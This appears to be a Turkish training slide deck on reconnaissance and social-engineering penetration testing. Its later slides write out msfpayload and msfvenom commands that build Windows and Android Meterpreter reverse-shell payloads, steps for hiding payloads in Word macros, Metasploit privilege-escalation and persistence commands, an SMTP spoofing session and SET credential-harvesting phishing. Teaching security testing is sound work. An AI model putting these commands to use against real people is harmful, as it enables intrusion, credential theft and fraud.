Sosyal Mühendislik Saldırıları

Bilgi Toplama ve Sosyal
Mühendislik Saldırıları
Türk Standardları Enstitüsü
Yazılım Test ve Belgelendirme Dairesi Başkanlığı
Tarih
1
Siber Dünyada Bilgi
Toplama Çalışmaları
2
Bilgi Toplama Çeşitleri
Pasif Bilgi Toplama
• Hedef sistemle
etkileşim yoktur.
Aktif Bilgi Toplama
• Hedef sistem üzerinde
tarama / arama gerçekleşir.
3
Bilgi Toplama Yöntemleri
Web ve
mail
arşivleri
Exif veya
Metadata
bilgileri
Port ve
servis
taramaları
Bilgi
Toplama
Arama
motorları
DNS
Sosyal
paylaşım
siteleri
4
Whois
Internet Temsilcileri
 RIPE (The Réseaux IP Européens) - http://www.ripe.net/
 ARIN (American Registry for Internet Numbers) - https://www.arin.net/
 AFRINIC (The Internet Numbers Registry for Africa) - http://www.afrinic.net/
 APNIC (Asia Pacific Network Information Centre) - https://www.apnic.net/
 LACNIC (The Latin American and Caribbean Internet Addresses Registry) http://www.lacnic.net/web/lacnic/ipv6
https://www.nic.tr/
5
Whois
WHOIS sorgu sonuçları
 DNS Sunucu Bilgisi
 Etki alanı adı detayları
 Fiziksel yerleşke
 Yönetimsel Bağlantılar
 Telefon ve Fax Numaraları
 E-posta adresi
WHOIS Arama Araçları
 DomainTools - http://whois.domaintools.com
 WhoisNet - http://www.whois.net
 WHO.IS - http://www.who.is
 InterNIC - http://www.internic.net/whois.html
 Linux whois komutu
6
DNS
7
DNS
8
DNS Değişirse Ne Olur?
9
Arama Motorları
• Neler Yapılabilir?
Elde Edilebilecek Bilgiler
• Hassas dizinler
• Kullanıcı adı, parola, e-posta adresi, sicil no vb. bilgiler
• Sunucu veya sistem zafiyetleri
• Kritik bilgi içeren dosyalar
• Kullanıcı giriş sayfaları
10
Google Hacking
site: İlgili sitede arama yapar.
inurl: Belirtilen ifadeyi URL içerisinde arar.
allinurl: Belirtilen ifadeleri URL içerisinde arar.
filetype: İlgili dosya uzantısında arama yapar.
intitle: Belirtilen ifadeyi başlıkta arar.
allintitle: Belirtilen ifadeleri başlıkta arar.
allintext: Belirtilen ifadeleri içerikte arar.
filetype:inc intext:mysql_connect site:*.tr
11
Arama Motorları
Shodan (www.shodanhq.com)
default password
12
Arama Motorları
Shodan
13
Arama Motorları
Shodan
14
Arama Motorları
Pipl
15
Arama Motorları
checkusernames.com
Facebook hesabı var
ama Google+ hesabı
yok. Aynı adla bir
hesap alıp insanları
kandırabilirim.
16
Belge Üstverisinden (Metadata) Bilgi Toplama
FOCA | Metagoofil
17
Belge Üstverisinden (Metadata) Bilgi Toplama
FOCA
18
Belge Üstverisinden (Metadata) Bilgi Toplama
FOCA
19
Belge Üstverisinden (Metadata) Bilgi Toplama
FOCA
20
Web Arşivleri
archive.org
21
Mail Arşivleri
www.mail-archive.com
22
The Harvester
Kullanımı
23
The Harvester
Örnek Sorgu
24
Robtex
Ters DNS Kaydı
212.175.160.24
belge.tse.org.tr’de açık varsa portal.tse.org.tr’de de açık vardır.
25
Netcraft
Netcraft
26
Maltego
27
SMTP
Olmayan e-posta adresine e-posta
gönderilir.
Bounce özelliği açık mı?
Hayır
Evet
Cevap gelir.
•
•
•
•
Network Haritası
Anti-virüs sistemi
Spam politikaları
Smtp yazılım bilgileri
28
Son Kullanıcıya Yönelik
Saldırı Çeşitleri ve
Yöntemleri
29
Sosyal Mühendislik
Tanım
• Bilgisayar güvenliği terimleriyle, insanlar
arasındaki iletişimde ve insan
davranışındaki modelleri açıklıklar olarak
tanıyıp, bunlardan faydalanarak güvenlik
süreçlerini atlatma yöntemine dayanan
müdahalelere verilen isimdir.
30
Sosyal Mühendislik Kavramı
• Sosyal Mühendislik: Normalde
insanların tanımadıkları biri için
yapmayacakları şeyleri yapmalarını
sağlama sanatıdır.
• Teknoloji kullanımından çok
insanların hile ile kandırılarak bilgi
elde edilmesidir.
31
Sosyal Mühendislik Kavramı
32
Sosyal Mühendislik Kavramı
• Çoğu zaman basit dolandırıcılığa çok benzese bile,
bu terim genelde bilgi sızdırmak veya bir bilgisayar
sistemine sızmak üzere yapılan yöntemler için
kullanılır.
• Bu durumların büyük çoğunluğunda saldırgan,
kurban ile yüz yüze gelmez.
• Kullandığı en büyük silahı, insan zaafiyetleridir.
33
Bir Sınırı Var mıdır?
İçinde insan olan her süreç bir şekilde
istismar edilebilir!!
34
Sosyal Mühendislik Saldırı Teknikleri
Omuz Sörfü
Tersine
Sosyal
Mühendislik
Çöp
Karıştırma
Sosyal
Mühendislik
Teknikleri
Oltalama
Truva Atları
Rol Yapma
35
Sosyal Mühendislik Sızma Testi Hedefleri
Kritik
bilgilere
erişim
Hedef
sistemlere
erişim
sağlama
Yönetici
hakkı elde
etme
Sistemi ele
geçirme
Gizlilik
Kalıcı olma
36
Sosyal Mühendislik Sızma Testi Çeşitleri
Fiziksel
sosyal
mühendislik
Telefon ile
sosyal
mühendislik
Mail yoluyla
sosyal
mühendislik
37
Kurumdaki güvenlik
bileşenleri
İnternet tarayıcısı ve
sürümü
Program
güncelleştirmeleri
Hassas olunan konular
Telefon yoluyla hassas
bilgi elde etme
Telefonla yönlendirme
Tarayıcı tabanlı
exploitation
Ofis dokümanı, PDF
tabanlı exploitation
Post-Exploitation
İnternet üzerinden
hedef kurum ve kişiler
hakkında bilgi
toplanması
Exploitation
Keşif
Sosyal Mühendislik Sızma Testi Aşamaları
Sistemde hak
yükseltme
Pivoting
Hassas bilgilere /
sistemlere erişim
Kalıcılık
Programlara zararlı
içerik ekleme
Web sayfası zafiyetinin
kullanılması
Form tabanlı Web
sayfalarıyla bilgi çalma
38
Güvenlik Bileşenlerini Atlatma Taktikleri
reverse_https
reverse_http
Custom
Payload
80 veya 443
portları
39
Bilgisayar Tabanlı Sosyal Mühendislik Yöntemleri
İnternet Tarayıcıları
Java Uygulamaları
PDF Okuyucular
Office Yazılımları
XSS Zafiyeti
Casus Yazılımlar
Form Tabanlı Web Sayfaları
40
Listener Kavramı
multi/handler
41
Custom Payload Oluşturma
msfpayload
-l : Payload’ları listeler
O : Payload için gerekli konfigürasyonları getirir.
• msfpayload windows/meterpreter/reverse_https O
X : Çalıştırılabilir dosya üretir.
• msfpayload windows/meterpreter/reverse_https LHOST=192.168.1.5 LPORT=443 X >
payload.exe
R : Sonraki iterasyona girdi sağlar.
• msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R |
msfencode ….
C: C formatında çıktı üretir.
• msfpayload windows/meterpreter/reverse_tcp EXITFUNC=seh LPORT=443 C > payload.c
42
Uygulama
43
Custom Payload Oluşturma
msfencode
• -e : Kullanılacak encoder
• -c : Encode işleminin kaç kez yapılacağı
• -o : Çıktı dosyası
• -t : Çıktı formatı
• -x : Şablon program
• -k : Zararlı kod enjekte edilen programın fonksiyonlarını
korumasını sağlar.
• -b: ‘\x00\xff’ gibi kötü karakterlerin oluşmasını engeller.
• -l: Encoder çeşitlerini listeler.
44
Custom Payload Oluşturma
msfvenom
•
•
•
•
-p : Payload
-f : Çıktı formatı
-x : Şablon program
-k : Zararlı kod enjekte edilen programın fonksiyonlarını korumasını
sağlar.
• -i : Encoding iterasyon sayısı
• -b: ‘\x00\xff’ gibi kötü karakterlerin oluşmasını engeller.
msfpayload
msfencode
msfvenom
45
Çalıştırılabilir Windows Programlarına Zararlı İçerik Eklenmesi
Exe oluşturma - Handler
46
Çalıştırılabilir Windows Programlarına Zararlı İçerik Eklenmesi
Oluşturulan exe’nin çalıştırılması
47
Çalıştırılabilir Windows Programlarına Zararlı İçerik Eklenmesi
Uzaktan oturum elde edilmesi
48
Custom Payload Oluşturma
Açık kaynak kodlu araçlar
• Veil
• AV0id
• Syringe
49
Uygulama
50
Custom Payload Oluşturma
Veil
51
PDF Dosyalarına Zararlı İçerik Eklenmesi
52
PDF Dosyalarına Zararlı İçerik Eklenmesi
53
Uygulama
54
Office Dosyalarına Zararlı İçerik Eklenmesi
Handler Oluşturma
55
Office Dosyalarına Zararlı İçerik Eklenmesi
Makro Virüs Oluşturulması
Oluşturulan exe payload vba uzantısına çevrilir.
• /usr/share/metasploit-framework/tools/exe2vba.rb
vba dosyası açıldığında 2 kısım görülmektedir.
• «Macro code» kısmı, View > Macros >View Macros > Create kısmına makro kodu
olarak eklenir.
• «Payload data» kısmı ofis belgesinde metin olarak eklenir.
56
Office Dosyalarına Zararlı İçerik Eklenmesi
vba oluşturulması – Word makrosuna eklenmesi
57
Office Dosyalarına Zararlı İçerik Eklenmesi
Payload Data
58
Uygulama
59
Firefox Eklentisine Zararlı İçerik Eklenmesi
60
Firefox Eklentisine Zararlı İçerik Eklenmesi
61
Uygulama
62
İnternet Tarayıcısı Zafiyetinin Kullanılması
CVE-2013-2551 Internet Explorer Zafiyeti
• Zafiyet 14 Mayıs 2013 tarihinde kapatıldı.
• Metasploit ms13_037_svg_dashstyle istismar modülü
• Bypass ASLR
Zafiyet barındıran sistemler
• Zafiyet barından uygulamaların sürümleri;
• Windows 7 SP1 işletim sisteminde çalışan JRE6 ve İnternet
Explorer 8 uygulaması,
• Windows 7 SP1 işletim sisteminden çalışan ve ntdll.dll
6.1.7601.17514 , 6.1.7601.17725 sürümlerini destekleyen
İnternet Explorer 8 uygulaması
63
İnternet Tarayıcısı Zafiyetinin Kullanılması
ms13_037_svg_dashstyle zafiyetinin istismar edilmesi
64
İnternet Tarayıcısı Zafiyetinin Kullanılması
ms13_037_svg_dashstyle zafiyetinin istismar edilmesi
65
İnternet Tarayıcısı Zafiyetinin Kullanılması
ms13_037_svg_dashstyle zafiyetinin istismar edilmesi
66
Java Zafiyetinin Kullanılması
Java_jre17_jmxbean_2
67
Java Zafiyetinin Kullanılması
Java_jre17_jmxbean_2
68
Java Zafiyetinin Kullanılması
Java_jre17_jmxbean_2 & Stored XSS
69
SET (Social-Engineer Toolkit)
Java Applet Attack
Website Attack Vectors
Browser Exploit Method
Infectious Media Attack
Credential Harvester
Attack Method
SMS Spoofing Attack Method
Tabnabbing Attack Method
Wireless Access Point Attack
Vector
Web Jacking Attack Method
QRCode Attack Vector
Multi-Attack Web Method
Powershell Attack Vector
Create or import a
CodeSigning Certificate
Social Engineering Attacks
70
SET-Credential Harvester Attack Method
71
SET-Credential Harvester Attack Method
72
SET-Credential Harvester Attack Method
73
SET-Credential Harvester Attack Method
74
Uygulama
75
Credential Harvester Attack Method
Daha Etkili Senaryo
Kullanılacak alan adı, var olan bir alan adına alt alan adı olarak eklenebilir.
Benzer domain alınabilir. (urlcrazy)
DNS isteği değiştirilebilir. (DNS-Spoofing)
76
Mobil Cihazlara Yönelik
Sosyal Mühendislik
Android Meterpreter
• msfpayload android/meterpreter/reverse_tcp
LHOST=10.20.20.117 LPORT=443 R >
android.apk
77
Mobil Cihazlara Yönelik
Sosyal Mühendislik
Android Meterpreter
78
Metasploit AutoRunScript
AutoRunScript
• Oturum açıldıktan sonra çalışacak «post-exploitation» modülleri handler
açılırken belirtilir.
• msf exploit(handler) > set AutoRunScript 'post/windows/escalate/getsystem‘
• Çoklu post-exploitation modül de eklenebilir. autoruncommands.rc’nin içine
kullanılacak post-exploitation modüller yazılmalıdır:
• msf exploit(handler) > set AutoRunScript multi_console_command -rc
/root/Desktop/autoruncommands.rc
79
Sosyal Mühendislik Senaryo
Hazırlığı Sonrası
Saldırı
Senaryosunun
Gerçeklenmesi
Telefon
E-posta
Fiziksel
E-posta
sistemlerinin
zafiyeti var mı?
80
Telefonla Sosyal Mühendislik
Gerçekçi
Tedirgin
edici
Güven
verici
Ses tonu
81
Relay (Yönlendirme) Zafiyeti
telnet mail.example.com 25
HELO [example.com]
mail from: [email protected]
rcpt to: [email protected]
DATA
From: "Deneme1" [email protected]
To: "[email protected]"
Subject: Konu
Mail içeriği
.
QUIT
82
Sahte E-posta Gönderilmesi
83
Sistemde Kalıcı Olma (Persistence)
Nedir?
Sisteme daha sonrasında erişim için kolay bir yol bırakmak; çünkü
•
•
•
•
Hedefteki eksik yamalar geçilebilir.
Bazı exploitler tek atımlıktır.
Bazen hedefe birden fazla erişim gerekebilir.
Sistemin yeniden başlatılması kurulan bağlantıları koparabilir.
Örneğin;
• Kalıcı Metasploit meterpreter
• Doğal OS Uygulamaları (RDP, SSH, Telnet ...)
84
Sistemde Kalıcı Olma (Persistence)
Meterpreter - Persistence
85
Uygulama
86
Uygulama
Zararlı Word dokümanı ile Sosyal Mühendislik senaryosu oluşturulması
Sanal Windows XP işletim sistemine aktarılması
«AutoRunScript» özelliği kullanılması
Yerel hak yükseltilmesi
Yerel kullanıcı şifre özetlerinin alınması
87
88